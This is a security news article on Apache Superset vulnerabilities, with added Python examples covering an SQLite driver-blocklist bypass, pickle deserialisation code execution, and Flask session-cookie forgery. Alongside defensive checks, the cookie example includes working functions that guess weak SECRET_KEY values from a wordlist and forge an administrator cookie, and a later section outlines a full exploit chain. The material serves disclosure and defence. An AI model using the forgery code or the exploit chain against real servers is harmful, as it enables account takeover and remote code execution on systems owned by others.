Alert: Apache Superset Vulnerabilities Expose Servers to Remote Code Execution Attacks
Patches have been released to address two new security vulnerabilities in Apache Superset that could be exploited by an attacker to gain remote code execution on affected systems.
The update (version 2.1.1) plugs CVE-2023-39265 and CVE-2023-37941, both of which become exploitable once an attacker is able to gain control of Superset's metadata database.
Outside of these weaknesses, the latest version of Superset also remediates a separate improper REST API permission issue (CVE-2023-36388) that allows low-privilege users to carry out server-side request forgery (SSRF) attacks.
“Superset by design allows privileged users to connect to arbitrary databases and execute arbitrary SQL queries against those databases using the powerful SQLLab interface,” Horizon3.ai’s Naveen Sunkavally said in a technical write-up.
“If Superset can be tricked into connecting to its own metadata database, an attacker can directly read or write application configuration through SQLLab. This leads to harvesting credentials and remote code execution.”
CVE-2023-39265 relates to a URI bypass when connecting to the SQLite database used for the metastore: a blocklist that rejects the plain "sqlite" driver name is sidestepped by an alternative spelling of the same driver, enabling an attacker to execute data manipulation commands against the metadata store.
Also tracked under the same CVE identifier is the lack of validation when importing SQLite database connection information from a file, which could be abused to import a maliciously crafted ZIP archive.
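The two bypass vectors described above share one root cause: the safety check keyed on the literal driver string, and it ran only on the interactive "add database" path. The following is an added example, not Superset's own code, showing the vulnerable pattern beside a check that compares the SQLAlchemy backend name instead, and applies the same check to an import bundle. The URI parsing is a small stand-in for SQLAlchemy's make_url(), and the import-bundle shape (a list of dicts with database_name and sqlalchemy_uri) is a constructed assumption.

```python
"""Blocking SQLite connections by backend name rather than literal driver string.

Added example, not Superset's code. It reproduces the class of bug that
CVE-2023-39265 describes: an exact-match blocklist on the full driver name is
bypassed by an alternative driver spelling such as sqlite+pysqlite, and a check
that only guards the "add database" UI path is bypassed by database imports.
"""
from typing import Iterable, List

# Backends that would let the web app open a local file (and, if the metadata
# store is SQLite, its own metadata database).
BLOCKED_BACKENDS = {"sqlite"}


def naive_is_blocked(uri: str) -> bool:
    """Vulnerable pattern: compare the whole drivername against literal entries.

    'sqlite:///x.db' is caught, 'sqlite+pysqlite:///x.db' is not, even though
    SQLAlchemy opens the same file either way.
    """
    drivername = uri.split("://", 1)[0]
    return drivername in {"sqlite"}


def backend_name(uri: str) -> str:
    """'sqlite+pysqlite:///x.db' -> 'sqlite' (stand-in for URL.get_backend_name()).

    The part before '+' is the dialect/backend; the part after it is only the
    DBAPI driver, so the blocklist must be applied to the backend.
    """
    if "://" not in uri:
        raise ValueError(f"not a SQLAlchemy URI: {uri!r}")
    drivername = uri.split("://", 1)[0]
    return drivername.split("+", 1)[0].strip().lower()


def is_blocked(uri: str) -> bool:
    """Hardened check: normalise to the backend, then consult the blocklist."""
    return backend_name(uri) in BLOCKED_BACKENDS


def validate_database_import(databases: Iterable[dict]) -> List[str]:
    """Run the same check over every connection in an import bundle.

    Constructed bundle shape: dicts with 'database_name' and 'sqlalchemy_uri'.
    Returns a list of human-readable errors; an empty list means accept.
    """
    errors = []
    for db in databases:
        name = db.get("database_name", "<unnamed>")
        uri = db.get("sqlalchemy_uri", "")
        try:
            if is_blocked(uri):
                errors.append(f"{name}: backend {backend_name(uri)!r} is not allowed")
        except ValueError as exc:
            errors.append(f"{name}: {exc}")
    return errors


# Constructed sample URIs covering the plain form, the alternative driver
# spelling, a case variant, and a legitimate remote database.
SAMPLE_URIS = [
    "sqlite:///superset.db",
    "sqlite+pysqlite:///superset.db",
    "SQLite:////var/lib/superset/superset.db",
    "postgresql+psycopg2://superset:pw@db:5432/superset",
]

if __name__ == "__main__":
    for uri in SAMPLE_URIS:
        print(f"{uri:55} naive={naive_is_blocked(uri)!s:5} hardened={is_blocked(uri)}")
```

Running the block shows the second sample passing the naive check while the hardened check rejects it; the import validator is the piece that was missing on the file-import path.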
“Superset versions from 1.5 to 2.1.0 use python’s pickle package to store certain configuration data,” Sunkavally said about CVE-2023-37941.
“An attacker with write access to the metadata database can insert an arbitrary pickle payload into the store, and then trigger deserialization of it, leading to remote code execution.”
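The mechanism behind CVE-2023-37941 is generic to pickle: loading untrusted bytes executes whatever callable the payload names. The following is an added example, not Superset's or Horizon3.ai's code. Its "payload" invokes a harmless recording function instead of a shell command, which is enough to show that pickle.loads() runs attacker-chosen code, and it shows a restricted unpickler that refuses any global lookup. The recorder and the shape of the stored blob are constructed for the demonstration.

```python
"""Why pickled configuration in an attacker-writable database is code execution.

Added example, not Superset's code. The payload below calls a harmless recorder
rather than os.system, but pickle resolves and calls it the same way.
"""
import io
import pickle

# Constructed side-effect sink standing in for "anything the attacker wants run".
CALLS = []


def attacker_callable(arg: str) -> str:
    CALLS.append(arg)
    return arg


class Payload:
    """pickle consults __reduce__ when serialising; the (callable, args) tuple it
    returns is recorded in the stream and executed by pickle.loads()."""

    def __reduce__(self):
        return (attacker_callable, ("executed on deserialisation",))


def craft_payload() -> bytes:
    """What an attacker with write access to the metadata store would insert."""
    return pickle.dumps(Payload())


def legit_blob() -> bytes:
    """A benign stored value of the kind the application actually expects."""
    return pickle.dumps({"a": [1, 2], "b": "x"})


def unsafe_load(blob: bytes):
    """The vulnerable pattern: trust whatever is in the row."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Mitigation when the storage format cannot be changed: refuse every global.

    Plain containers and scalars are built from opcodes without find_class, so a
    dict of strings/ints still loads; any reference to a module attribute,
    which is what every pickle RCE payload needs, is rejected.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def rejected(blob: bytes) -> bool:
    """True if the restricted loader refuses the blob."""
    try:
        safe_load(blob)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    blob = craft_payload()
    print("unsafe_load ->", unsafe_load(blob), "| side effects:", CALLS)
    print("safe_load rejects payload:", rejected(blob))
    print("safe_load still reads benign data:", safe_load(legit_blob()))
```

The restricted unpickler is a stop-gap; for configuration data the durable fix is a format that cannot name code at all, such as JSON, so that a writable metadata row is a data-integrity problem rather than code execution.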
Some of the other flaws that have been patched in the latest release are listed below:
- A MySQL arbitrary file read vulnerability that could be exploited to obtain credentials to the metadata database
- Abuse of the superset load_examples command to obtain the metadata database URI from the user interface and modify data stored in it
- The use of default credentials to access the metadata database in some installations of Superset
- The leak of database credentials in plaintext when querying the /api/v1/database API as a privileged user (CVE-2023-30776, fixed in 2.1.0)
The disclosure comes a little over four months after Horizon3.ai disclosed a high-severity flaw in the same product (CVE-2023-27524, CVSS score: 8.9) that could enable unauthorized attackers to gain admin access to the servers and execute arbitrary code.
The problem arises as a result of using a default SECRET_KEY that could be abused by attackers to authenticate and access unauthorized resources on internet-exposed installations.
Since the public disclosure of the flaw in April 2023, Horizon3.ai said 2,076 out of 3,842 Superset servers are still using a default SECRET_KEY, with about 72 instances using a trivially guessable SECRET_KEY such as superset, SUPERSET_SECRET_KEY, 1234567890, admin, changeme, thisisasecretkey, and your_secret_key_here.
“The user is responsible for setting the Flask SECRET_KEY, which invariably leads to some users setting weak keys,” Sunkavally said, urging the maintainers to add support for automatically generating the key.
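The cookie forgery that makes a default or guessable SECRET_KEY fatal is short enough to show end to end. The following is an added example, not Superset's or Horizon3.ai's code: it re-implements the Flask session cookie format (itsdangerous URLSafeTimedSerializer with salt "cookie-session", HMAC-SHA1 and "hmac" key derivation, optional zlib-compressed payload) with the standard library so it runs offline. The wordlist is the one the article reports; the assumption that the logged-in user id lives under the "_user_id" session key (Flask-Login's convention) and the admin id of "1" are assumptions, and interoperability with a live Flask instance is not asserted here.

```python
"""Forging a Flask session cookie when SECRET_KEY is default or guessable.

Added example; not Superset's or Horizon3.ai's code. Re-implements Flask's
session cookie format (itsdangerous URLSafeTimedSerializer: salt
"cookie-session", HMAC-SHA1, "hmac" key derivation) with the standard library.
"""
import base64
import binascii
import hashlib
import hmac
import json
import secrets
import time
import zlib
from typing import Iterable, Optional

SALT = b"cookie-session"
SEP = b"."
# Weak values the article reports seeing on exposed instances (constructed list).
WEAK_KEYS = ["superset", "SUPERSET_SECRET_KEY", "1234567890", "admin",
             "changeme", "thisisasecretkey", "your_secret_key_here"]
USER_ID_KEY = "_user_id"  # assumption: Flask-Login's session key for the user id


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(s: bytes) -> bytes:
    return base64.urlsafe_b64decode(s + b"=" * (-len(s) % 4))


def _mac(secret: str, msg: bytes) -> bytes:
    # derived = HMAC(secret, salt); signature = HMAC(derived, message)
    derived = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return hmac.new(derived, msg, hashlib.sha1).digest()


def sign_session(secret: str, data: dict, ts: Optional[int] = None) -> str:
    """Server side: serialise, timestamp and sign the session dict."""
    payload = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(payload)
    body = b"." + _b64e(packed) if len(packed) < len(payload) - 1 else _b64e(payload)
    ts = int(time.time()) if ts is None else ts
    signed = body + SEP + _b64e(ts.to_bytes(max(1, (ts.bit_length() + 7) // 8), "big"))
    return (signed + SEP + _b64e(_mac(secret, signed))).decode()


def load_session(secret: str, cookie: str, max_age: Optional[int] = None) -> Optional[dict]:
    """Server side: return the session dict, or None if signature or age fails."""
    signed, _, sig = cookie.encode().rpartition(SEP)
    try:
        if not sig or not hmac.compare_digest(_b64d(sig), _mac(secret, signed)):
            return None
        body, _, ts_b = signed.rpartition(SEP)
        if max_age is not None and time.time() - int.from_bytes(_b64d(ts_b), "big") > max_age:
            return None
        raw = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
        return json.loads(raw)
    except (binascii.Error, zlib.error, ValueError):
        return None


def decode_unverified(cookie: str) -> dict:
    """Anyone holding the cookie can read it; the signature only stops tampering."""
    body = cookie.encode().rsplit(SEP, 2)[0]
    raw = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(raw)


def guess_secret(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline check: which candidate key, if any, validates this cookie?"""
    return next((k for k in candidates if load_session(k, cookie) is not None), None)


def forge_admin_cookie(cookie: str, candidates: Iterable[str], admin_id: str = "1") -> Optional[str]:
    """The attack the article describes: guess the key, rewrite the user id, re-sign."""
    key = guess_secret(cookie, candidates)
    if key is None:
        return None
    data = decode_unverified(cookie)
    data[USER_ID_KEY] = admin_id
    return sign_session(key, data)


def weak_key_findings(secret: str) -> list:
    """Configuration check an operator can run against their own SECRET_KEY."""
    findings = []
    if secret in WEAK_KEYS:
        findings.append("matches a known weak/default value")
    if len(secret) < 32:
        findings.append("shorter than 32 characters")
    return findings


def generate_secret_key() -> str:
    return secrets.token_urlsafe(42)


if __name__ == "__main__":
    cookie = sign_session("superset", {USER_ID_KEY: "7", "csrf_token": "abc"})
    print("readable without the key:", decode_unverified(cookie))
    forged = forge_admin_cookie(cookie, WEAK_KEYS)
    print("server accepts forged cookie as:", load_session("superset", forged))
    strong = generate_secret_key()
    print("forgery against random key:", forge_admin_cookie(sign_session(strong, {USER_ID_KEY: "7"}), WEAK_KEYS))
```

guess_secret is the same test a scanner runs against an exposed instance: a captured cookie either validates under a wordlist entry or it does not, so no login is needed to tell a default key from a random one. The fix is entirely on the operator side: a long random SECRET_KEY, and rotating it invalidates every cookie signed under the old one.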
“At the root of many of the vulnerabilities […] is the fact that the Superset web interface permits users to connect to the metadata database.”
Related news
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This includes CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability impacting the Apache Superset open-source data visualization software that could enable remote code execution.
Apache Superset versions 2.0.0 and below utilize Flask with a known default secret key which is used to sign HTTP cookies. These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be set for that dashboard within Superset's database which will trigger the remote code execution. An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.
If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend. This vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0.
Apache Superset would allow for SQLite database connections to be incorrectly registered when an attacker uses alternative driver names like sqlite+pysqlite or by using database imports. This could allow for unexpected file creation on Superset webservers. Additionally, if Apache Superset is using a SQLite database for its metadata (not advised for production use) it could result in more severe vulnerabilities related to confidentiality and integrity. This vulnerability exists in Apache Superset versions up to and including 2.1.0.
Improper REST API permission in Apache Superset up to and including 2.1.0 allows authenticated Gamma users to test network connections, enabling possible SSRF.
An authenticated user with specific data permissions could access database connections stored passwords by requesting a specific REST API. This issue affects Apache Superset version 1.3.0 up to 2.0.1.
The maintainers of the Apache Superset open source data visualization software have released fixes to plug an insecure default configuration that could lead to remote code execution. The vulnerability, tracked as CVE-2023-27524 (CVSS score: 8.9), impacts versions up to and including 2.0.1 and relates to the use of a default SECRET_KEY that could be abused by attackers to authenticate and access
Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.